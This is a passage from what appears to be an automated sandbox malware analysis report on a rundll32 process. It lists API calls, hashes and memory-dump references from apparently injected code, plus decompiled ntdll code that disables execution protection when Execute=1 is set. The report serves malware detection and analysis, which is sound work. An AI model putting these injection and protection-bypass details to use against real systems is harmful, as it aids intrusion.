                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1836367815-0
                                                                                                                              • Opcode ID: 0d70bb20ac1754cf19ff485728356f2134ca43e89fa48438e314ba91e26190b6
                                                                                                                              • Instruction ID: caeb3496b7b84972a801f5d0ed6c69a4d48a788872007ea031a465a633230c81
                                                                                                                              • Opcode Fuzzy Hash: 0d70bb20ac1754cf19ff485728356f2134ca43e89fa48438e314ba91e26190b6
                                                                                                                              • Instruction Fuzzy Hash: 5B01B931A812297BE715AA949C47FFE7B6C7B80B54F040119FF04BB1C2D7A4690546E6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00538310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0053836A
                                                                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0053838B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1836367815-0
                                                                                                                              • Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                                                                                                              • Instruction ID: b604d969fef137909f3bc3f6b7fc30cb4264f2bd0dd577267f3d5449fc5a34d7
                                                                                                                              • Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                                                                                                              • Instruction Fuzzy Hash: F901A731A8132977EB21A6949C07FFE7B6C7B80F55F040114FF04BA1C2E694690546F6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0054A765 Relevance: 1.6, APIs: 1, Instructions: 62processCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0054A724
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2186235152-0
                                                                                                                              • Opcode ID: 88a9a11d9bc1c3abfd4b01f9b654d6556a85f97f356b46c183008b25253b6380
                                                                                                                              • Instruction ID: a79ca66c06398d2c5fe94f9a7b9ee8283fe587d274e0d8a643fb78d0841ea578
                                                                                                                              • Opcode Fuzzy Hash: 88a9a11d9bc1c3abfd4b01f9b654d6556a85f97f356b46c183008b25253b6380
                                                                                                                              • Instruction Fuzzy Hash: 0C11D3B6210109AFCB04DF99EC81DEB77ADAF8C758F118248FA1D97245D630E851CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0053ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0053AD52
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Load
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2234796835-0
                                                                                                                              • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                              • Instruction ID: 351e438517ee824f99469dc75a1124b793268d6d286c809b4a44c318166cc3ab
                                                                                                                              • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                              • Instruction Fuzzy Hash: B1015EB5E4020EABDF10EAA4DC46FDDBB78AB54308F004594E90897241F631EB04CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0054A6D0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0054A724
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2186235152-0
                                                                                                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                              • Instruction ID: 0b0ac0375ee9afbea991855f666a3296d7b36c0dcf52a528452feb498c6a3298
                                                                                                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                              • Instruction Fuzzy Hash: A601B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 005491A0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0053F040,?,?,00000000), ref: 005491DC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2422867632-0
                                                                                                                              • Opcode ID: 6688f86f132fa37c9027dc8d1c8f8cbb4e701adb4342013b9a08c6fd41ac5782
                                                                                                                              • Instruction ID: 0d970fa4f83a2ffc669e3eb4b48291b617d3b2787710eb739a83a774fbba31a2
                                                                                                                              • Opcode Fuzzy Hash: 6688f86f132fa37c9027dc8d1c8f8cbb4e701adb4342013b9a08c6fd41ac5782
                                                                                                                              • Instruction Fuzzy Hash: 6DE06D373902043AE6206599AC03FE7B79CEBD1B24F14002AFA0DEB2C1D595F80142A5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00549193 Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0053F040,?,?,00000000), ref: 005491DC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2422867632-0
                                                                                                                              • Opcode ID: 09284c93ec22430693913e4e54fcfab77b7646447d3692d8f73a6cbce32f8d18
                                                                                                                              • Instruction ID: 593d21141da97ee490cf5d90c93e4356c0df51f1518862b9095b7b4343cffa98
                                                                                                                              • Opcode Fuzzy Hash: 09284c93ec22430693913e4e54fcfab77b7646447d3692d8f73a6cbce32f8d18
                                                                                                                              • Instruction Fuzzy Hash: 09F02B7A38030077E3306A588C03FE77758EFC0B24F14042DF649BB2C1D5A5B50187A4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0054A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0053F1C2,0053F1C2,?,00000000,?,?), ref: 0054A7F0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3899507212-0
                                                                                                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                              • Instruction ID: 13f159d354574360ef7cc0bf7da00340a42fe360f1806e0f5d9814f01ff56500
                                                                                                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                              • Instruction Fuzzy Hash: CBE01AB52002086BDB10DF49CC85EE737ADAF88654F018154BE0C57242C930E8148BF5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0053F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,00538D14,?), ref: 0053F6EB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                                              • Instruction ID: 1f5dfe95fa98a3bcdbe5acf15cc153f1ca784875e856f20df2069c4618d29444
                                                                                                                              • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                                              • Instruction Fuzzy Hash: 99D0A7727903043BE610FAE49C07F6637CC7B54B04F490074F948D73C3D954E4004565
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 9ba94aac1236a73a80f14121caebf2f1d46926c27a92e70c2073e8c47057f952
                                                                                                                              • Instruction ID: 93e85ca63a71d0e070217c07df053176a4b0a8c1e99d0f34f167fa44c4f2ce78
                                                                                                                              • Opcode Fuzzy Hash: 9ba94aac1236a73a80f14121caebf2f1d46926c27a92e70c2073e8c47057f952
                                                                                                                              • Instruction Fuzzy Hash: A3B02B318018C0C7FB00EF200708707790077D0304F11C051D2830390E4338D0D0F271
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

                                                                                                                              Function 0054730D Relevance: .0, Instructions: 21COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1834bb20c259ab844c2d246dcb82b50895d03f575589d6b2734cb617e3b31cbe
                                                                                                                              • Instruction ID: d607b2794d0a8f38c13e858d15bdc0a415f7ee3eab2bed500dc719f5244e55ff
                                                                                                                              • Opcode Fuzzy Hash: 1834bb20c259ab844c2d246dcb82b50895d03f575589d6b2734cb617e3b31cbe
                                                                                                                              • Instruction Fuzzy Hash: 78C0126AA0020859C5185D787D51AFCEB6097C6AB7F04736AE944B30516506D816555C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00537B1C Relevance: .0, Instructions: 16COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 93e9b370c502b982bd05f425f92b99788247e1946f8b58d31d2bd90078fb0fae
                                                                                                                              • Instruction ID: 1b0fbfbc16d48c616459062a33e62f7a633ba1e82d4cb6c68920cd3cf91008b1
                                                                                                                              • Opcode Fuzzy Hash: 93e9b370c502b982bd05f425f92b99788247e1946f8b58d31d2bd90078fb0fae
                                                                                                                              • Instruction Fuzzy Hash: B6C08C72A0A70182C1145F0CB8C01B0F366EB5323AF0027E3D9086B201CAA3E8A20288
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04697550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 63%
                                                                                                                              			E04697550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x475b370 ^ _t107;
				_v8 =  *0x475b370 ^ _t107;
				_t105 = __ecx;
				if( *0x4756664 == 0) {
					L5:
					return E046A4B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E0466E580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E04697738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E0469763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E046A2B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E046976ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E046EEF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E046A8F40( &_v548, 0, 0x214);
						_t106 =  *0x4756664;
						_t110 = _t108 + 0x20;
						 *0x47591e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x4756664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E046A4C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E046EEF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E046AA9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E046EEF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E046AA690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E046EEF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E046DCC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E046EEF10();
						goto L15;
					}
					L8:
					_t56 = E04697648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}
































                                                                                                                              0x04697560
                                                                                                                              0x04697562
                                                                                                                              0x0469756f
                                                                                                                              0x04697571
                                                                                                                              0x046975ab
                                                                                                                              0x046975b9
                                                                                                                              0x046975b9
                                                                                                                              0x04697579
                                                                                                                              0x04697583
                                                                                                                              0x0469758f
                                                                                                                              0x046d4443
                                                                                                                              0x04697595
                                                                                                                              0x0469759e
                                                                                                                              0x0469759e
                                                                                                                              0x046975a2
                                                                                                                              0x046975bc
                                                                                                                              0x046975c2
                                                                                                                              0x046975c7
                                                                                                                              0x046975c9
                                                                                                                              0x04697621
                                                                                                                              0x04697623
                                                                                                                              0x04697624
                                                                                                                              0x046975f8
                                                                                                                              0x046975ff
                                                                                                                              0x04697601
                                                                                                                              0x0469762c
                                                                                                                              0x04697603
                                                                                                                              0x04697609
                                                                                                                              0x04697610
                                                                                                                              0x04697612
                                                                                                                              0x04697612
                                                                                                                              0x04697612
                                                                                                                              0x04697614
                                                                                                                              0x04697616
                                                                                                                              0x04697630
                                                                                                                              0x04697633
                                                                                                                              0x04697633
                                                                                                                              0x04697618
                                                                                                                              0x0469761a
                                                                                                                              0x046d45c9
                                                                                                                              0x046d45c9
                                                                                                                              0x046d45d1
                                                                                                                              0x046d45d2
                                                                                                                              0x046d45d4
                                                                                                                              0x046d45d6
                                                                                                                              0x046d45d6
                                                                                                                              0x00000000
                                                                                                                              0x0469761a
                                                                                                                              0x046975ce
                                                                                                                              0x046975d4
                                                                                                                              0x046975da
                                                                                                                              0x046975df
                                                                                                                              0x046975e1
                                                                                                                              0x046d444a
                                                                                                                              0x046d4450
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x046d4456
                                                                                                                              0x046d4469
                                                                                                                              0x046d4476
                                                                                                                              0x046d4486
                                                                                                                              0x046d448b
                                                                                                                              0x046d4497
                                                                                                                              0x046d44b9
                                                                                                                              0x046d44bf
                                                                                                                              0x046d44c1
                                                                                                                              0x046d44c3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x046d44c9
                                                                                                                              0x046d44cf
                                                                                                                              0x046d44d1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x046d44dc
                                                                                                                              0x046d44de
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x046d44e6
                                                                                                                              0x046d44ed
                                                                                                                              0x046d44ef
                                                                                                                              0x046d45c4
                                                                                                                              0x00000000
                                                                                                                              0x046d45c4
                                                                                                                              0x046d44f7
                                                                                                                              0x046d44f8
                                                                                                                              0x046d4510
                                                                                                                              0x046d4515
                                                                                                                              0x046d4524
                                                                                                                              0x046d452b
                                                                                                                              0x046d452c
                                                                                                                              0x046d452e
                                                                                                                              0x046d4556
                                                                                                                              0x046d4561
                                                                                                                              0x046d4567
                                                                                                                              0x046d4569
                                                                                                                              0x046d456c
                                                                                                                              0x046d456e
                                                                                                                              0x046d4574
                                                                                                                              0x046d4576
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x046d457c
                                                                                                                              0x046d457c
                                                                                                                              0x046d4584
                                                                                                                              0x046d4588
                                                                                                                              0x046d458a
                                                                                                                              0x046d458c
                                                                                                                              0x046d458e
                                                                                                                              0x046d458e
                                                                                                                              0x046d459b
                                                                                                                              0x046d45a0
                                                                                                                              0x046d45a7
                                                                                                                              0x046d45ac
                                                                                                                              0x046d45ae
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x046d45b4
                                                                                                                              0x046d45b4
                                                                                                                              0x046d45b7
                                                                                                                              0x046d45b7
                                                                                                                              0x00000000
                                                                                                                              0x046d45bf
                                                                                                                              0x046d4530
                                                                                                                              0x046d4535
                                                                                                                              0x046d4537
                                                                                                                              0x046d4539
                                                                                                                              0x00000000
                                                                                                                              0x046d453e
                                                                                                                              0x046975e7
                                                                                                                              0x046975e9
                                                                                                                              0x046975ee
                                                                                                                              0x046975f0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x046975f2
                                                                                                                              0x00000000
                                                                                                                              0x046975a4
                                                                                                                              0x046975a4
                                                                                                                              0x046975a4
                                                                                                                              0x00000000
                                                                                                                              0x046975a4

                                                                                                                              Strings
                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 046D454D
                                                                                                                              • Execute=1, xrefs: 046D451E
                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 046D4530
                                                                                                                              • ExecuteOptions, xrefs: 046D44AB
                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 046D4592
                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 046D4460
                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 046D4507
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                              • API String ID: 0-484625025
                                                                                                                              • Opcode ID: 19217c668ffe8915b6c7d6c295daa4bcb609542056fae921b8378bc25f9468fb
                                                                                                                              • Instruction ID: 97dc67246fefb77fd51fa2732ae42c9633548e656ac465f2dcb1edf9d4301734
                                                                                                                              • Opcode Fuzzy Hash: 19217c668ffe8915b6c7d6c295daa4bcb609542056fae921b8378bc25f9468fb
                                                                                                                              • Instruction Fuzzy Hash: C951E671B10219BAEF50AE94DC99BF973ECEF58305F0404A9E505A7281FAB0BE458E64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04669046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 67%
                                                                                                                              			E04669046(void* __ebx, signed char* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr* _t146;
				intOrPtr* _t148;
				signed char* _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x473be98);
				E046B7C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E046A8F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E04679870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x47565e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E0467A170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
